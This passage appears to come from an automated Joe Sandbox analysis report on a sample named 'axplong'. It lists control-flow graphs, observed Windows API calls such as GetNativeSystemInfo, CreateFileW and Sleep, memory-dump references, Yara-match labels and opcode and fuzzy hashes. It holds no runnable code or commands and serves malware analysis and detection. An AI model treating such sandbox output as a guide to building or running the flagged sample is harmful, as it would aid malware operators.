                    • Instruction Fuzzy Hash: 94613432D302128BDF35DFA8E8856ADB7A0EB45317F644116EC48AB250E6309C2D8B59

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1453 2282b0-228331 call 254020 1457 228333-228338 1453->1457 1458 22833d-228365 call 237870 call 225b20 1453->1458 1459 22847f-22849b call 23cf21 1457->1459 1466 228367 1458->1466 1467 228369-22838b call 237870 call 225b20 1458->1467 1466->1467 1472 22838f-2283a8 1467->1472 1473 22838d 1467->1473 1476 2283aa-2283b9 1472->1476 1477 2283d9-228404 1472->1477 1473->1472 1478 2283bb-2283c9 1476->1478 1479 2283cf-2283d6 call 23d593 1476->1479 1480 228431-228452 1477->1480 1481 228406-228415 1477->1481 1478->1479 1484 22849c-2284a1 call 256b9a 1478->1484 1479->1477 1482 228454-228456 GetNativeSystemInfo 1480->1482 1483 228458-22845d 1480->1483 1486 228427-22842e call 23d593 1481->1486 1487 228417-228425 1481->1487 1490 22845e-228465 1482->1490 1483->1490 1486->1480 1487->1484 1487->1486 1490->1459 1495 228467-22846f 1490->1495 1496 228471-228476 1495->1496 1497 228478-22847b 1495->1497 1496->1459 1497->1459 1498 22847d 1497->1498 1498->1459
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?), ref: 00228454
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 1b0f16221bd5ed91eb2512e4c1eb0d3e6e79120844fe62ff9bbc28b6f0a29591
                    • Instruction ID: fdc434f3d557d4b14e989062dc35e611f125dca6dd784c563c07f3a3ba576928
                    • Opcode Fuzzy Hash: 1b0f16221bd5ed91eb2512e4c1eb0d3e6e79120844fe62ff9bbc28b6f0a29591
                    • Instruction Fuzzy Hash: D7512B70D21229ABEB24FF64DC457EDB7759B45304F504298E804A72C1DF75DA90CB91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1499 256c99-256ca5 1500 256cc4-256ce8 call 254020 1499->1500 1501 256ca7-256cc3 call 257430 call 257443 call 256b8a 1499->1501 1507 256d06-256d28 CreateFileW 1500->1507 1508 256cea-256d04 call 257430 call 257443 call 256b8a 1500->1508 1510 256d38-256d3f call 256d77 1507->1510 1511 256d2a-256d2e call 256e01 1507->1511 1531 256d72-256d76 1508->1531 1522 256d40-256d42 1510->1522 1518 256d33-256d36 1511->1518 1518->1522 1524 256d64-256d67 1522->1524 1525 256d44-256d61 call 254020 1522->1525 1526 256d70 1524->1526 1527 256d69-256d6f 1524->1527 1525->1524 1526->1531 1527->1526
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 30d73868db03f1ce69146765e5548889a8e240496fcf295520afb5897feb0ecf
                    • Instruction ID: 66a63e35fb398d1342f213122694e67e63fb02754c606cba00e665308b552d9e
                    • Opcode Fuzzy Hash: 30d73868db03f1ce69146765e5548889a8e240496fcf295520afb5897feb0ecf
                    • Instruction Fuzzy Hash: 78213D729252047AEB117F64AC46BAF37399F4133AF600310FD343B1D0DB705D299AA9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1533 256f71-256f87 1534 256f97-256fa7 1533->1534 1535 256f89-256f8d 1533->1535 1540 256fe7-256fea 1534->1540 1541 256fa9-256fbb SystemTimeToTzSpecificLocalTime 1534->1541 1535->1534 1536 256f8f-256f95 1535->1536 1537 256fec-256ff7 call 23cf21 1536->1537 1540->1537 1541->1540 1543 256fbd-256fdd call 256ff8 1541->1543 1545 256fe2-256fe5 1543->1545 1545->1537
                    APIs
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00256FB3
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$LocalSpecificSystem
                    • String ID:
                    • API String ID: 2574697306-0
                    • Opcode ID: 3a3b3bbd6ae8322d595c5ea932739113c9cfadc172dd485c228046899fdda60c
                    • Instruction ID: f70c60e550e052f4ce2299f72754deb52a0a8e09464a08348dfc9884bda30c8d
                    • Opcode Fuzzy Hash: 3a3b3bbd6ae8322d595c5ea932739113c9cfadc172dd485c228046899fdda60c
                    • Instruction Fuzzy Hash: 08110DB291020DABDB10DED5D844EDFB7BCAB08315F504266E916E7180E730EB588B65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1546 25d6ef-25d6fa 1547 25d6fc-25d706 1546->1547 1548 25d708-25d70e 1546->1548 1547->1548 1549 25d73c-25d747 call 257443 1547->1549 1550 25d727-25d738 RtlAllocateHeap 1548->1550 1551 25d710-25d711 1548->1551 1557 25d749-25d74b 1549->1557 1553 25d713-25d71a call 259c81 1550->1553 1554 25d73a 1550->1554 1551->1550 1553->1549 1559 25d71c-25d725 call 258cf9 1553->1559 1554->1557 1559->1549 1559->1550
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0025A5ED,?,002574AE,?,00000000,?), ref: 0025D731
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: d729071ab79579edc94c09d3362bf7b77ed09b154b4d3b6bc589629057dc6506
                    • Instruction ID: e520113d6ab98cbb3e5a3c516c00a4f4ccc4f3005982e951c56cf48b1c950277
                    • Opcode Fuzzy Hash: d729071ab79579edc94c09d3362bf7b77ed09b154b4d3b6bc589629057dc6506
                    • Instruction Fuzzy Hash: 99F0E931A75126679B312E215D05B5BB799DF897B3B184112AC04EA181CB70E82847E9

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: ccd07ec709620d58c1ad5f322de85688f9578b1b1323ffcd435c7a24df265165
                    • Instruction ID: ea4f7bfd2546aded904f564a55c9a3b226a095d02212a2e4975717969a014545
                    • Opcode Fuzzy Hash: ccd07ec709620d58c1ad5f322de85688f9578b1b1323ffcd435c7a24df265165
                    • Instruction Fuzzy Hash: 95F0F9B5E20514FBC710BBA8AC0B71D7B75A707B64F800348E811672D1DB705A244FD2
                    Memory Dump Source
                    • Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ecea18d853541a6a53097e9be1c682d108c7ed69bb23a1505bb5626cfb41f1a
                    • Instruction ID: 45649011c746fcce74d71971b03eab13ccc468c2af1d8da2e195c1936c385fe0
                    • Opcode Fuzzy Hash: 3ecea18d853541a6a53097e9be1c682d108c7ed69bb23a1505bb5626cfb41f1a
                    • Instruction Fuzzy Hash: 51113AF754C2E0AEE60341A76E25AF66FEED9D3630339455BF482C6043D7D2160AA172
                    Memory Dump Source
                    • Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 170d40327b37e77e679b4a328501f6c400fe4cc5bd0d9c8f1093bfefb04e88c8
                    • Instruction ID: e471294fa6577e3f6084c88fbc0f76feaf49f1e1c11d2280dc5c95e75f1664e4
                    • Opcode Fuzzy Hash: 170d40327b37e77e679b4a328501f6c400fe4cc5bd0d9c8f1093bfefb04e88c8
                    • Instruction Fuzzy Hash: 5BF0E9B710D121FDAA0699537B10EFA7BBFDAC0730334841BF442C4412D3A5568AB6B1
                    Memory Dump Source
                    • Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3973a827f1512107c4e0646f59e84f6ff9615ac6ab9b2e66e92a4e6b5ebfb39f
                    • Instruction ID: 6cbf06154fbb119f880759e1ec0d2f1143be62b8c817891b3a335c66774c4178
                    • Opcode Fuzzy Hash: 3973a827f1512107c4e0646f59e84f6ff9615ac6ab9b2e66e92a4e6b5ebfb39f
                    • Instruction Fuzzy Hash: 6CF0A0F750D160BEB50295537E58AFA3BEED9C5631334485EF442C5003CB961A8A9672
                    Memory Dump Source
                    • Source File: 00000005.00000002.3458678045.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ce0000_axplong.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f2b086ec833a1adf586a49e1ed582fa3feb0b0ccb0d0fa925cef1722da2c13c8
                    • Instruction ID: 156fd6f028f580d3e3e21c35f3d5b3c49496322605e07faa5a0e43c77aed456a
                    • Opcode Fuzzy Hash: f2b086ec833a1adf586a49e1ed582fa3feb0b0ccb0d0fa925cef1722da2c13c8
                    • Instruction Fuzzy Hash: 9BF0A7BB108124FDB5025943BE10EFA7BAFE6C07307348416F443C1502D3E65A867671
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 0bdec2a405837c368a4356779c45418c82035a00ecfdaf044a177c501b20c7e5
                    • Instruction ID: 018552de8d5d3453534833abe0d10d052240fc450bda141e4d6dd77ba7755765
                    • Opcode Fuzzy Hash: 0bdec2a405837c368a4356779c45418c82035a00ecfdaf044a177c501b20c7e5
                    • Instruction Fuzzy Hash: 08C26C71E282298FDB25CE28DD447E9B3B9EB48305F1441EAD84EE7240E774AED58F40
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction ID: 3c8988acc54ae269c988d549323e8392c030faf7eee39a33027cffa446efd30a
                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction Fuzzy Hash: 35F15071E1061ADFDF14CFA8C9806ADB7B1FF48314F258269E815AB384D731AE55CB90
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0022247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: 'k#d+($'k#d+(
                    • API String ID: 2659868963-81376138
                    • Opcode ID: d983a9ed468281cf7cf65a9eb3bdab303b5b766ee684285062c9c4f91e1d4027
                    • Instruction ID: d6e20020db0216374d83594d12ae66517ea92959987d410726f24cee9b23c2b4
                    • Opcode Fuzzy Hash: d983a9ed468281cf7cf65a9eb3bdab303b5b766ee684285062c9c4f91e1d4027
                    • Instruction Fuzzy Hash: FC519CB2A2160ACFDB19CF64E8857AABBF0FB18310F24856AD804EB254D7749954CF90
                    APIs
                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0023CE82,?,?,?,?,0023CEB7,?,?,?,?,?,?,0023C42D,?,00000001), ref: 0023CB33
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FilePreciseSystem
                    • String ID:
                    • API String ID: 1802150274-0
                    • Opcode ID: 30f4453913bc9fe218caaf0e92e0740a095ec99c2f6c2c0e200928a3cd7eb2b7
                    • Instruction ID: d6c8a5ed3b440b4b7a8a8f2f9e3184a31892a08b9c45430cd0d6db96a369f49a
                    • Opcode Fuzzy Hash: 30f4453913bc9fe218caaf0e92e0740a095ec99c2f6c2c0e200928a3cd7eb2b7
                    • Instruction Fuzzy Hash: 5BD02233523038A7CA012B91BC0C8ADFB4E9B00B587180111ED08331208A91BC605BD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: dd77365cdd002d60a69e542875ef33d440194fd27c2dea7cb474a860b76c2d60
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
